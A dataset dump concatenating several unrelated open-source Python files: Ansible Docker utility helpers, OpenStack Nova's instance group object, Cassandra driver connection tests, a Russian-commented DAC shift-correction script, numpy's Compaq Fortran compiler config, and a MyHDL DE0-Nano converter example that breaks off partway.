# If we would know that both a and b do not contain duplicates,
# we could simply compare len(a) to len(b) to finish this test.
# We can assume that b has no duplicates (as it is returned by
# docker), but we don't know for a.
for bv in b:
found = False
for av in a:
if compare_dict_allow_more_present(av, bv):
found = True
break
if not found:
return False
return True
class DifferenceTracker(object):
def __init__(self):
self._diff = []
def add(self, name, parameter=None, active=None):
self._diff.append(dict(
name=name,
parameter=parameter,
active=active,
))
def merge(self, other_tracker):
self._diff.extend(other_tracker._diff)
@property
def empty(self):
return len(self._diff) == 0
def get_before_after(self):
'''
Return texts ``before`` and ``after``.
'''
before = dict()
after = dict()
for item in self._diff:
before[item['name']] = item['active']
after[item['name']] = item['parameter']
return before, after
def has_difference_for(self, name):
'''
Returns a boolean if a difference exists for name
'''
return any(diff for diff in self._diff if diff['name'] == name)
def get_legacy_docker_container_diffs(self):
'''
Return differences in the docker_container legacy format.
'''
result = []
for entry in self._diff:
item = dict()
item[entry['name']] = dict(
parameter=entry['parameter'],
container=entry['active'],
)
result.append(item)
return result
def get_legacy_docker_diffs(self):
'''
Return differences in the docker_container legacy format.
'''
result = [entry['name'] for entry in self._diff]
return result
def clean_dict_booleans_for_docker_api(data):
'''
Go doesn't like Python booleans 'True' or 'False', while Ansible is just
fine with them in YAML. As such, they need to be converted in cases where
we pass dictionaries to the Docker API (e.g. docker_network's
driver_options and docker_prune's filters).
'''
result = dict()
if data is not None:
for k, v in data.items():
if v is True:
v = 'true'
elif v is False:
v = 'false'
else:
v = str(v)
result[str(k)] = v
return result
def convert_duration_to_nanosecond(time_str):
"""
Return time duration in nanosecond.
"""
if not isinstance(time_str, str):
raise ValueError('Missing unit in duration - %s' % time_str)
regex = re.compile(
r'^(((?P<hours>\d+)h)?'
r'((?P<minutes>\d+)m(?!s))?'
r'((?P<seconds>\d+)s)?'
r'((?P<milliseconds>\d+)ms)?'
r'((?P<microseconds>\d+)us)?)$'
)
parts = regex.match(time_str)
if not parts:
raise ValueError('Invalid time duration - %s' % time_str)
parts = parts.groupdict()
time_params = {}
for (name, value) in parts.items():
if value:
time_params[name] = int(value)
delta = timedelta(**time_params)
time_in_nanoseconds = (
delta.microseconds + (delta.seconds + delta.days * 24 * 3600) * 10 ** 6
) * 10 ** 3
return time_in_nanoseconds
def parse_healthcheck(healthcheck):
"""
Return dictionary of healthcheck parameters and boolean if
healthcheck defined in image was requested to be disabled.
"""
if (not healthcheck) or (not healthcheck.get('test')):
return None, None
result = dict()
# All supported healthcheck parameters
options = dict(
test='test',
interval='interval',
timeout='timeout',
start_period='start_period',
retries='retries'
)
duration_options = ['interval', 'timeout', 'start_period']
for (key, value) in options.items():
if value in healthcheck:
if healthcheck.get(value) is None:
# due to recursive argument_spec, all keys are always present
# (but have default value None if not specified)
continue
if value in duration_options:
time = convert_duration_to_nanosecond(healthcheck.get(value))
if time:
result[key] = time
elif healthcheck.get(value):
result[key] = healthcheck.get(value)
if key == 'test':
if isinstance(result[key], (tuple, list)):
result[key] = [str(e) for e in result[key]]
else:
result[key] = ['CMD-SHELL', str(result[key])]
elif key == 'retries':
try:
result[key] = int(result[key])
except ValueError:
raise ValueError(
'Cannot parse number of retries for healthcheck. '
'Expected an integer, got "{0}".'.format(result[key])
)
if result['test'] == ['NONE']:
# If the user explicitly disables the healthcheck, return None
# as the healthcheck object, and set disable_healthcheck to True
return None, True
return result, False
| gpl-3.0 | -8,445,795,930,743,039,000 | 39.136456 | 156 | 0.55323 | false |
devendermishrajio/nova | nova/objects/instance_group.py | 1 | 10292 | # Copyright (c) 2013 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_utils import uuidutils
from oslo_utils import versionutils
from nova.compute import utils as compute_utils
from nova import db
from nova import exception
from nova import objects
from nova.objects import base
from nova.objects import fields
LAZY_LOAD_FIELDS = ['hosts']
# TODO(berrange): Remove NovaObjectDictCompat
@base.NovaObjectRegistry.register
class InstanceGroup(base.NovaPersistentObject, base.NovaObject,
base.NovaObjectDictCompat):
# Version 1.0: Initial version
# Version 1.1: String attributes updated to support unicode
# Version 1.2: Use list/dict helpers for policies, metadetails, members
# Version 1.3: Make uuid a non-None real string
# Version 1.4: Add add_members()
# Version 1.5: Add get_hosts()
# Version 1.6: Add get_by_name()
# Version 1.7: Deprecate metadetails
# Version 1.8: Add count_members_by_user()
# Version 1.9: Add get_by_instance_uuid()
# Version 1.10: Add hosts field
VERSION = '1.10'
fields = {
'id': fields.IntegerField(),
'user_id': fields.StringField(nullable=True),
'project_id': fields.StringField(nullable=True),
'uuid': fields.UUIDField(),
'name': fields.StringField(nullable=True),
'policies': fields.ListOfStringsField(nullable=True),
'members': fields.ListOfStringsField(nullable=True),
'hosts': fields.ListOfStringsField(nullable=True),
}
def obj_make_compatible(self, primitive, target_version):
target_version = versionutils.convert_version_to_tuple(target_version)
if target_version < (1, 7):
# NOTE(danms): Before 1.7, we had an always-empty
# metadetails property
primitive['metadetails'] = {}
@staticmethod
def _from_db_object(context, instance_group, db_inst):
"""Method to help with migration to objects.
Converts a database entity to a formal object.
"""
# Most of the field names match right now, so be quick
for field in instance_group.fields:
if field in LAZY_LOAD_FIELDS:
continue
if field == 'deleted':
instance_group.deleted = db_inst['deleted'] == db_inst['id']
else:
instance_group[field] = db_inst[field]
instance_group._context = context
instance_group.obj_reset_changes()
return instance_group
def obj_load_attr(self, attrname):
# NOTE(sbauza): Only hosts could be lazy-loaded right now
if attrname != 'hosts':
raise exception.ObjectActionError(
action='obj_load_attr', reason='unable to load %s' % attrname)
self.hosts = self.get_hosts()
self.obj_reset_changes(['hosts'])
@base.remotable_classmethod
def get_by_uuid(cls, context, uuid):
db_inst = db.instance_group_get(context, uuid)
return cls._from_db_object(context, cls(), db_inst)
@base.remotable_classmethod
def get_by_name(cls, context, name):
# TODO(russellb) We need to get the group by name here. There's no
# db.api method for this yet. Come back and optimize this by
# adding a new query by name. This is unnecessarily expensive if a
# tenant has lots of groups.
igs = objects.InstanceGroupList.get_by_project_id(context,
context.project_id)
for ig in igs:
if ig.name == name:
return ig
raise exception.InstanceGroupNotFound(group_uuid=name)
@base.remotable_classmethod
def get_by_instance_uuid(cls, context, instance_uuid):
db_inst = db.instance_group_get_by_instance(context, instance_uuid)
return cls._from_db_object(context, cls(), db_inst)
@classmethod
def get_by_hint(cls, context, hint):
if uuidutils.is_uuid_like(hint):
return cls.get_by_uuid(context, hint)
else:
return cls.get_by_name(context, hint)
@base.remotable
def save(self):
"""Save updates to this instance group."""
updates = self.obj_get_changes()
# NOTE(sbauza): We do NOT save the set of compute nodes that an
# instance group is connected to in this method. Instance groups are
# implicitly connected to compute nodes when the
# InstanceGroup.add_members() method is called, which adds the mapping
# table entries.
# So, since the only way to have hosts in the updates is to set that
# field explicitely, we prefer to raise an Exception so the developer
# knows he has to call obj_reset_changes(['hosts']) right after setting
# the field.
if 'hosts' in updates:
raise exception.InstanceGroupSaveException(field='hosts')
if not updates:
return
payload = dict(updates)
payload['server_group_id'] = self.uuid
db.instance_group_update(self._context, self.uuid, updates)
db_inst = db.instance_group_get(self._context, self.uuid)
self._from_db_object(self._context, self, db_inst)
compute_utils.notify_about_server_group_update(self._context,
"update", payload)
@base.remotable
def refresh(self):
"""Refreshes the instance group."""
current = self.__class__.get_by_uuid(self._context, self.uuid)
for field in self.fields:
if self.obj_attr_is_set(field) and self[field] != current[field]:
self[field] = current[field]
self.obj_reset_changes()
@base.remotable
def create(self):
if self.obj_attr_is_set('id'):
raise exception.ObjectActionError(action='create',
reason='already created')
updates = self.obj_get_changes()
payload = dict(updates)
updates.pop('id', None)
policies = updates.pop('policies', None)
members = updates.pop('members', None)
db_inst = db.instance_group_create(self._context, updates,
policies=policies,
members=members)
self._from_db_object(self._context, self, db_inst)
payload['server_group_id'] = self.uuid
compute_utils.notify_about_server_group_update(self._context,
"create", payload)
@base.remotable
def destroy(self):
payload = {'server_group_id': self.uuid}
db.instance_group_delete(self._context, self.uuid)
self.obj_reset_changes()
compute_utils.notify_about_server_group_update(self._context,
"delete", payload)
@base.remotable_classmethod
def add_members(cls, context, group_uuid, instance_uuids):
payload = {'server_group_id': group_uuid,
'instance_uuids': instance_uuids}
members = db.instance_group_members_add(context, group_uuid,
instance_uuids)
compute_utils.notify_about_server_group_update(context,
"addmember", payload)
return list(members)
@base.remotable
def get_hosts(self, exclude=None):
"""Get a list of hosts for non-deleted instances in the group
This method allows you to get a list of the hosts where instances in
this group are currently running. There's also an option to exclude
certain instance UUIDs from this calculation.
"""
filter_uuids = self.members
if exclude:
filter_uuids = set(filter_uuids) - set(exclude)
filters = {'uuid': filter_uuids, 'deleted': False}
instances = objects.InstanceList.get_by_filters(self._context,
filters=filters)
return list(set([instance.host for instance in instances
if instance.host]))
@base.remotable
def count_members_by_user(self, user_id):
"""Count the number of instances in a group belonging to a user."""
filter_uuids = self.members
filters = {'uuid': filter_uuids, 'user_id': user_id, 'deleted': False}
instances = objects.InstanceList.get_by_filters(self._context,
filters=filters)
return len(instances)
@base.NovaObjectRegistry.register
class InstanceGroupList(base.ObjectListBase, base.NovaObject):
# Version 1.0: Initial version
# InstanceGroup <= version 1.3
# Version 1.1: InstanceGroup <= version 1.4
# Version 1.2: InstanceGroup <= version 1.5
# Version 1.3: InstanceGroup <= version 1.6
# Version 1.4: InstanceGroup <= version 1.7
# Version 1.5: InstanceGroup <= version 1.8
# Version 1.6: InstanceGroup <= version 1.9
# Version 1.7: InstanceGroup <= version 1.10
VERSION = '1.7'
fields = {
'objects': fields.ListOfObjectsField('InstanceGroup'),
}
@base.remotable_classmethod
def get_by_project_id(cls, context, project_id):
groups = db.instance_group_get_all_by_project_id(context, project_id)
return base.obj_make_list(context, cls(context), objects.InstanceGroup,
groups)
@base.remotable_classmethod
def get_all(cls, context):
groups = db.instance_group_get_all(context)
return base.obj_make_list(context, cls(context), objects.InstanceGroup,
groups)
| apache-2.0 | -7,126,459,705,232,050,000 | 39.046693 | 79 | 0.610668 | false |
vipjml/python-driver | tests/integration/standard/test_connection.py | 2 | 13526 | # Copyright 2013-2016 DataStax, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
try:
import unittest2 as unittest
except ImportError:
import unittest # noqa
from functools import partial
from six.moves import range
import sys
from threading import Thread, Event
import time
from cassandra import ConsistencyLevel, OperationTimedOut
from cassandra.cluster import NoHostAvailable, Cluster
from cassandra.io.asyncorereactor import AsyncoreConnection
from cassandra.protocol import QueryMessage
from cassandra.connection import Connection
from cassandra.policies import WhiteListRoundRobinPolicy, HostStateListener
from cassandra.pool import HostConnectionPool
from tests import is_monkey_patched
from tests.integration import use_singledc, PROTOCOL_VERSION, get_node
try:
from cassandra.io.libevreactor import LibevConnection
except ImportError:
LibevConnection = None
def setup_module():
use_singledc()
class ConnectionTimeoutTest(unittest.TestCase):
def setUp(self):
self.defaultInFlight = Connection.max_in_flight
Connection.max_in_flight = 2
self.cluster = Cluster(protocol_version=PROTOCOL_VERSION, load_balancing_policy=WhiteListRoundRobinPolicy(['127.0.0.1']))
self.session = self.cluster.connect()
def tearDown(self):
Connection.max_in_flight = self.defaultInFlight
self.cluster.shutdown()
def test_in_flight_timeout(self):
"""
Test to ensure that connection id fetching will block when max_id is reached/
In previous versions of the driver this test will cause a
NoHostAvailable exception to be thrown, when the max_id is restricted
@since 3.3
@jira_ticket PYTHON-514
@expected_result When many requests are run on a single node connection acquisition should block
until connection is available or the request times out.
@test_category connection timeout
"""
futures = []
query = '''SELECT * FROM system.local'''
for i in range(100):
futures.append(self.session.execute_async(query))
for future in futures:
future.result()
class TestHostListener(HostStateListener):
host_down = None
def on_down(self, host):
host_down = host
class HeartbeatTest(unittest.TestCase):
"""
Test to validate failing a heartbeat check doesn't mark a host as down
@since 3.3
@jira_ticket PYTHON-286
@expected_result host should not be marked down when heartbeat fails
@test_category connection heartbeat
"""
def setUp(self):
self.cluster = Cluster(protocol_version=PROTOCOL_VERSION, idle_heartbeat_interval=1)
self.session = self.cluster.connect(wait_for_all_pools=True)
def tearDown(self):
self.cluster.shutdown()
def test_heart_beat_timeout(self):
# Setup a host listener to ensure the nodes don't go down
test_listener = TestHostListener()
host = "127.0.0.1"
node = get_node(1)
initial_connections = self.fetch_connections(host, self.cluster)
self.assertNotEqual(len(initial_connections), 0)
self.cluster.register_listener(test_listener)
# Pause the node
try:
node.pause()
# Wait for connections associated with this host go away
self.wait_for_no_connections(host, self.cluster)
# Resume paused node
finally:
node.resume()
# Run a query to ensure connections are re-established
current_host = ""
count = 0
while current_host != host and count < 100:
rs = self.session.execute_async("SELECT * FROM system.local", trace=False)
rs.result()
current_host = str(rs._current_host)
count += 1
time.sleep(.1)
self.assertLess(count, 100, "Never connected to the first node")
new_connections = self.wait_for_connections(host, self.cluster)
self.assertIsNone(test_listener.host_down)
# Make sure underlying new connections don't match previous ones
for connection in initial_connections:
self.assertFalse(connection in new_connections)
def fetch_connections(self, host, cluster):
# Given a cluster object and host grab all connection associated with that host
connections = []
holders = cluster.get_connection_holders()
for conn in holders:
if host == str(getattr(conn, 'host', '')):
if isinstance(conn, HostConnectionPool):
if conn._connections is not None and len(conn._connections) > 0:
connections.append(conn._connections)
else:
if conn._connection is not None:
connections.append(conn._connection)
return connections
def wait_for_connections(self, host, cluster):
retry = 0
while(retry < 300):
retry += 1
connections = self.fetch_connections(host, cluster)
if len(connections) is not 0:
return connections
time.sleep(.1)
self.fail("No new connections found")
def wait_for_no_connections(self, host, cluster):
retry = 0
while(retry < 100):
retry += 1
connections = self.fetch_connections(host, cluster)
if len(connections) is 0:
return
time.sleep(.5)
self.fail("Connections never cleared")
class ConnectionTests(object):
klass = None
def setUp(self):
self.klass.initialize_reactor()
def get_connection(self, timeout=5):
"""
Helper method to solve automated testing issues within Jenkins.
Officially patched under the 2.0 branch through
17998ef72a2fe2e67d27dd602b6ced33a58ad8ef, but left as is for the
1.0 branch due to possible regressions for fixing an
automated testing edge-case.
"""
conn = None
e = None
for i in range(5):
try:
conn = self.klass.factory(host='127.0.0.1', timeout=timeout, protocol_version=PROTOCOL_VERSION)
break
except (OperationTimedOut, NoHostAvailable) as e:
continue
if conn:
return conn
else:
raise e
def test_single_connection(self):
"""
Test a single connection with sequential requests.
"""
conn = self.get_connection()
query = "SELECT keyspace_name FROM system.schema_keyspaces LIMIT 1"
event = Event()
def cb(count, *args, **kwargs):
count += 1
if count >= 10:
conn.close()
event.set()
else:
conn.send_msg(
QueryMessage(query=query, consistency_level=ConsistencyLevel.ONE),
request_id=0,
cb=partial(cb, count))
conn.send_msg(
QueryMessage(query=query, consistency_level=ConsistencyLevel.ONE),
request_id=0,
cb=partial(cb, 0))
event.wait()
def test_single_connection_pipelined_requests(self):
"""
Test a single connection with pipelined requests.
"""
conn = self.get_connection()
query = "SELECT keyspace_name FROM system.schema_keyspaces LIMIT 1"
responses = [False] * 100
event = Event()
def cb(response_list, request_num, *args, **kwargs):
response_list[request_num] = True
if all(response_list):
conn.close()
event.set()
for i in range(100):
conn.send_msg(
QueryMessage(query=query, consistency_level=ConsistencyLevel.ONE),
request_id=i,
cb=partial(cb, responses, i))
event.wait()
def test_multiple_connections(self):
"""
Test multiple connections with pipelined requests.
"""
conns = [self.get_connection() for i in range(5)]
events = [Event() for i in range(5)]
query = "SELECT keyspace_name FROM system.schema_keyspaces LIMIT 1"
def cb(event, conn, count, *args, **kwargs):
count += 1
if count >= 10:
conn.close()
event.set()
else:
conn.send_msg(
QueryMessage(query=query, consistency_level=ConsistencyLevel.ONE),
request_id=count,
cb=partial(cb, event, conn, count))
for event, conn in zip(events, conns):
conn.send_msg(
QueryMessage(query=query, consistency_level=ConsistencyLevel.ONE),
request_id=0,
cb=partial(cb, event, conn, 0))
for event in events:
event.wait()
def test_multiple_threads_shared_connection(self):
"""
Test sharing a single connections across multiple threads,
which will result in pipelined requests.
"""
num_requests_per_conn = 25
num_threads = 5
event = Event()
conn = self.get_connection()
query = "SELECT keyspace_name FROM system.schema_keyspaces LIMIT 1"
def cb(all_responses, thread_responses, request_num, *args, **kwargs):
thread_responses[request_num] = True
if all(map(all, all_responses)):
conn.close()
event.set()
def send_msgs(all_responses, thread_responses):
for i in range(num_requests_per_conn):
qmsg = QueryMessage(query=query, consistency_level=ConsistencyLevel.ONE)
with conn.lock:
request_id = conn.get_request_id()
conn.send_msg(qmsg, request_id, cb=partial(cb, all_responses, thread_responses, i))
all_responses = []
threads = []
for i in range(num_threads):
thread_responses = [False] * num_requests_per_conn
all_responses.append(thread_responses)
t = Thread(target=send_msgs, args=(all_responses, thread_responses))
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
event.wait()
def test_multiple_threads_multiple_connections(self):
"""
Test several threads, each with their own Connection and pipelined
requests.
"""
num_requests_per_conn = 25
num_conns = 5
events = [Event() for i in range(5)]
query = "SELECT keyspace_name FROM system.schema_keyspaces LIMIT 1"
def cb(conn, event, thread_responses, request_num, *args, **kwargs):
thread_responses[request_num] = True
if all(thread_responses):
conn.close()
event.set()
def send_msgs(conn, event):
thread_responses = [False] * num_requests_per_conn
for i in range(num_requests_per_conn):
qmsg = QueryMessage(query=query, consistency_level=ConsistencyLevel.ONE)
with conn.lock:
request_id = conn.get_request_id()
conn.send_msg(qmsg, request_id, cb=partial(cb, conn, event, thread_responses, i))
event.wait()
threads = []
for i in range(num_conns):
conn = self.get_connection()
t = Thread(target=send_msgs, args=(conn, events[i]))
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
def test_connect_timeout(self):
# Underlying socket implementations don't always throw a socket timeout even with min float
# This can be timing sensitive, added retry to ensure failure occurs if it can
max_retry_count = 10
exception_thrown = False
for i in range(max_retry_count):
start = time.time()
try:
self.get_connection(timeout=sys.float_info.min)
except Exception as e:
end = time.time()
self.assertAlmostEqual(start, end, 1)
exception_thrown = True
break
self.assertTrue(exception_thrown)
class AsyncoreConnectionTests(ConnectionTests, unittest.TestCase):
klass = AsyncoreConnection
def setUp(self):
if is_monkey_patched():
raise unittest.SkipTest("Can't test asyncore with monkey patching")
ConnectionTests.setUp(self)
class LibevConnectionTests(ConnectionTests, unittest.TestCase):
klass = LibevConnection
def setUp(self):
if is_monkey_patched():
raise unittest.SkipTest("Can't test libev with monkey patching")
if LibevConnection is None:
raise unittest.SkipTest(
'libev does not appear to be installed properly')
ConnectionTests.setUp(self)
| apache-2.0 | 6,823,360,571,779,303,000 | 33.156566 | 129 | 0.605353 | false |
zaqwes8811/matlab_ext | measurement/mc-assistant/projects/py_hw_models/shift_correction_model.py | 1 | 5592 | #-*- coding: utf-8 -*-
""" Convention :
cu - conventional unit - условная единица - шаг
"""
import sys
import math
# Other
import convertors_simple_data_types.xintyy_type_convertors as tc
import convertors_simple_data_types.float32_convertors as f32conv
from py_dbg_toolkit.doColoredConsole import co
import uasio.os_io.io_wrapper as iow
def _print_formatter(string):
string = '0x'+string
return string[:-1].replace(' ', ', 0x')
def _hex_word_to_int(hexWord):
sum = 0
for pos in range(0, len(hexWord)):
oneIt = tc.hex2int(hexWord[pos])*math.pow(16, len(hexWord)-pos-1)
sum += oneIt
return sum
def calc_for_ukv(
correcting_mult, # температурный коэффициент, V/oC
T, # Температура 8 бит бит/градус
src_shift_code # значение кода для установки смещения по умолчанию из EEPROM
):
# Запираем здесь глобальное пространство имен
# constants
_kSets = { 'name': 'convertion.log', 'howOpen': 'a', 'coding': 'cp1251'}
_kOutProportion = 4000/4.6 # cu/V число, загружаемое в ЦАП
""" Метод отображения результатов и плагины для вывода на комм. строку
notes. : Низший модуль передает полностью всю информацию. Потом можно разбить
регулярными выражениями
rem. : функции обратного вызова можно собрать в кортеж и внизу управлять
действиями по имени
"""
# подборка плагинов
def plot_plugin(string): # пустой
None
def plot_plugin_full(string):
print string
def _plot_item(msg, value):
print msg+" "+str(value)
ieee, mchip = f32conv.pack_f32_into_i32(value, _kPluginList["None"])
mchip = _print_formatter(mchip)
lst = list()
lst.append('; '+msg+' '+mchip+' ; '+str(value)+'\n')
iow.list2file(_kSets, lst)
def _print_string(msg):
lst = list()
lst.append('; '+msg+'\n')
iow.list2file(_kSets, lst)
def _plot_word(msg, word):
""" msg : Lhl Hhl"""
string = tc.byte2hex(int(word)%256) # L
string += ' '+ tc.byte2hex(int(word)/256) # H
print msg+' '+string
lst = list()
lst.append('; '+msg+' '+string+'\n')
iow.list2file(_kSets, lst)
def _new_line():
lst = list()
lst.append('\n')
iow.list2file(_kSets, lst)
def _eprint_value(name, value):
_eprint(name+' : '+str(value)+'\n')
def _wprint_value(name, value):
_wprint(name+' : '+str(value)+'\n')
def _nprint_value(name, value):
_nprint(name+' : '+str(value)+'\n')
# shortcuts
_nprint = co.printN
_wprint = co.printW
_eprint = co.printE
_kPluginList = {"None" : plot_plugin, 'Full':plot_plugin_full}
""" Расчет для УКВ ЧМ
@version : 1.0
@notes:
v 1.0
precond.:
1. попр. коэфф. всегда берется по модулю
2. при коррекции кода склад. или выч. в зависимости от знака коэфф. коррекции
contraints :
@math:
u_shift = u_shift_src+K*T [float32]
u_shift_code = to_code*(from_code*u_shift_src_code+K*T) =
u_shift_src+to_code*(K*T) = u_shift_src + int(T*(to_code*K)) =
u_shift_src+sign(K)*int(T*(to_code*abs(K)))
"""
# Измерены вольтметром
out_dac_voltage = 4.37
real_shift = 10.9
result = 0
# Run
abs_correcting_mult = math.fabs(correcting_mult) # ufloat
dVwave = abs_correcting_mult*T # реальные вольты
dVdigital = _kOutProportion*dVwave # напряжение в cu
# Коррекция из-за усилителя - значение кода должно уменшится
dVdigital *= (out_dac_voltage/real_shift)
# поправка
K = dVdigital/T # cu(uint16)/oC положительная!
# значение изначального кода смещения для расчетов
src_shift_code = _hex_word_to_int(src_shift_code)
# uintXX = uintXX+(or -)uintXX
out_shift_code = src_shift_code+math.copysign(1, abs_correcting_mult)*dVdigital # вычитание вот здесь
# Report
msg = 'T oC :'
_plot_word(msg, T)
_plot_item(msg, T)
msg = 'dU, cu LH:'
_plot_word(msg, dVdigital)
msg = 'dU, cu :'
_plot_item(msg, dVdigital)
msg = 'Out shift value, cu LH:'
_plot_word(msg, out_shift_code)
msg = 'Out shift value, cu float32:'
_plot_item(msg, out_shift_code)
msg = 'K, cu(uint16)/oC:'
_print_string(msg+' '+str(K))
_plot_item('mK_to_Barg ', K)
_new_line()
if __name__=='__main__' :
kCorrectingMult = 4.9*5*1e-3 # Коэффициент перевода величины, V/oC
print 'kCorrectingMult', kCorrectingMult
T = 10
src_shift_code = '0111' # Исходно зачение EEPROM
calc_for_ukv(
kCorrectingMult,
T,
src_shift_code)
| apache-2.0 | -3,052,068,157,021,306,400 | 28.527273 | 106 | 0.574713 | false |
MSeifert04/numpy | numpy/distutils/fcompiler/compaq.py | 4 | 4109 |
#http://www.compaq.com/fortran/docs/
from __future__ import division, absolute_import, print_function
import os
import sys
from numpy.distutils.fcompiler import FCompiler
from numpy.distutils.compat import get_exception
from distutils.errors import DistutilsPlatformError
compilers = ['CompaqFCompiler']
if os.name != 'posix' or sys.platform[:6] == 'cygwin' :
# Otherwise we'd get a false positive on posix systems with
# case-insensitive filesystems (like darwin), because we'll pick
# up /bin/df
compilers.append('CompaqVisualFCompiler')
class CompaqFCompiler(FCompiler):
compiler_type = 'compaq'
description = 'Compaq Fortran Compiler'
version_pattern = r'Compaq Fortran (?P<version>[^\s]*).*'
if sys.platform[:5]=='linux':
fc_exe = 'fort'
else:
fc_exe = 'f90'
executables = {
'version_cmd' : ['<F90>', "-version"],
'compiler_f77' : [fc_exe, "-f77rtl", "-fixed"],
'compiler_fix' : [fc_exe, "-fixed"],
'compiler_f90' : [fc_exe],
'linker_so' : ['<F90>'],
'archiver' : ["ar", "-cr"],
'ranlib' : ["ranlib"]
}
module_dir_switch = '-module ' # not tested
module_include_switch = '-I'
def get_flags(self):
return ['-assume no2underscore', '-nomixed_str_len_arg']
def get_flags_debug(self):
return ['-g', '-check bounds']
def get_flags_opt(self):
return ['-O4', '-align dcommons', '-assume bigarrays',
'-assume nozsize', '-math_library fast']
def get_flags_arch(self):
return ['-arch host', '-tune host']
def get_flags_linker_so(self):
if sys.platform[:5]=='linux':
return ['-shared']
return ['-shared', '-Wl,-expect_unresolved,*']
class CompaqVisualFCompiler(FCompiler):
compiler_type = 'compaqv'
description = 'DIGITAL or Compaq Visual Fortran Compiler'
version_pattern = (r'(DIGITAL|Compaq) Visual Fortran Optimizing Compiler'
r' Version (?P<version>[^\s]*).*')
compile_switch = '/compile_only'
object_switch = '/object:'
library_switch = '/OUT:' #No space after /OUT:!
static_lib_extension = ".lib"
static_lib_format = "%s%s"
module_dir_switch = '/module:'
module_include_switch = '/I'
ar_exe = 'lib.exe'
fc_exe = 'DF'
if sys.platform=='win32':
from numpy.distutils.msvccompiler import MSVCCompiler
try:
m = MSVCCompiler()
m.initialize()
ar_exe = m.lib
except DistutilsPlatformError:
pass
except AttributeError:
msg = get_exception()
if '_MSVCCompiler__root' in str(msg):
print('Ignoring "%s" (I think it is msvccompiler.py bug)' % (msg))
else:
raise
except IOError:
e = get_exception()
if not "vcvarsall.bat" in str(e):
print("Unexpected IOError in", __file__)
raise e
except ValueError:
e = get_exception()
if not "'path'" in str(e):
print("Unexpected ValueError in", __file__)
raise e
executables = {
'version_cmd' : ['<F90>', "/what"],
'compiler_f77' : [fc_exe, "/f77rtl", "/fixed"],
'compiler_fix' : [fc_exe, "/fixed"],
'compiler_f90' : [fc_exe],
'linker_so' : ['<F90>'],
'archiver' : [ar_exe, "/OUT:"],
'ranlib' : None
}
def get_flags(self):
return ['/nologo', '/MD', '/WX', '/iface=(cref,nomixed_str_len_arg)',
'/names:lowercase', '/assume:underscore']
def get_flags_opt(self):
return ['/Ox', '/fast', '/optimize:5', '/unroll:0', '/math_library:fast']
def get_flags_arch(self):
return ['/threads']
def get_flags_debug(self):
return ['/debug']
if __name__ == '__main__':
from distutils import log
log.set_verbosity(2)
from numpy.distutils import customized_fcompiler
print(customized_fcompiler(compiler='compaq').get_version())
| bsd-3-clause | -509,323,686,165,539,700 | 31.611111 | 82 | 0.55926 | false |
cfelton/rhea | examples/boards/de0nano/converters/de0nano_converters.py | 1 | 4159 |
"""
This example uses the A/D converter and the accelerometer.
The example retrieves the samples from the converters and ...
"""
from __future__ import division
import myhdl
from myhdl import (Signal, intbv, always_comb, always_seq,
always, TristateSignal, concat, instances)
from rhea.system import Clock, Reset, Global, FIFOBus
from rhea.cores.converters import adc128s022
from rhea.cores.spi import spi_controller
from rhea.cores.spi import SPIBus
from rhea.cores.video import VideoMemory
from rhea.cores.video import color_bars
from rhea.cores.video.lcd import lt24lcd
from rhea.cores.video.lcd import LT24Interface
from rhea.cores.misc import glbl_timer_ticks
import rhea.build as build
from rhea.build.boards import get_board
# board definition for the automated flow
brd, flow = None, None
@myhdl.block
def de0nano_converters(clock, reset, led,
# ADC signals
adc_cs_n, adc_saddr, adc_sdat, adc_sclk,
# Accelerometer and I2C signals
i2c_sclk, i2c_sdat, g_sensor_cs_n, g_sensor_int,
# LT24 LCD display signals
lcd_on, lcd_resetn, lcd_csn, lcd_rs,
lcd_wrn, lcd_rdn, lcd_data
):
"""
The port names are the same as those in the board definition
(names in the user manual) for automatic mapping by the
rhea.build automation.
"""
# signals and interfaces
glbl = Global(clock, reset)
adcbus = SPIBus()
adcbus.mosi, adcbus.miso, adcbus.csn, adcbus.sck = (
adc_saddr, adc_sdat, adc_cs_n, adc_sclk)
fifobus = FIFOBus(width=16)
channel = Signal(intbv(0, min=0, max=8))
# ----------------------------------------------------------------
# global ticks
t_inst = glbl_timer_ticks(glbl, include_seconds=True, user_timer=16)
# ----------------------------------------------------------------
# instantiate the ADC controller (retieves samples)
conv_inst = adc128s022(glbl, fifobus, adcbus, channel)
# read the samples out of the FIFO interface
fiford = Signal(bool(0))
@always(clock.posedge)
def beh_read():
fiford = not fifobus.empty
@always_comb
def beh_read_gate():
fifobus.read.next = fiford and not fifobus.empty
# for now assign the samples to the LEDs for viewing
heartbeat = Signal(bool(0))
@always_seq(clock.posedge, reset=reset)
def beh_leds():
if glbl.tick_sec:
heartbeat.next = not heartbeat
led.next = concat(fifobus.read_data[12:5], heartbeat)
# ----------------------------------------------------------------
# LCD dislay
lcd = LT24Interface()
resolution, color_depth = lcd.resolution, lcd.color_depth
lcd.assign(
lcd_on, lcd_resetn, lcd_csn, lcd_rs, lcd_wrn, lcd_rdn, lcd_data
)
# color bars and the interface between video source-n-sink
vmem = VideoMemory(resolution=resolution, color_depth=color_depth)
bar_inst = color_bars(glbl, vmem, resolution=resolution,
color_depth=color_depth)
# LCD video driver
lcd_inst = lt24lcd(glbl, vmem, lcd)
return myhdl.instances()
# the default port map
# @todo: should be able to extact this from the board
# definition:
# portmap = brd.map_ports(de0nano_converters)
de0nano_converters.portmap = {
'clock': Clock(0, frequency=50e6),
'reset': Reset(0, active=0, isasync=True),
'led': Signal(intbv(0)[8:]),
'adc_cs_n': Signal(bool(1)),
'adc_saddr': Signal(bool(1)),
'adc_sdat': Signal(bool(1)),
'adc_sclk': Signal(bool(1)),
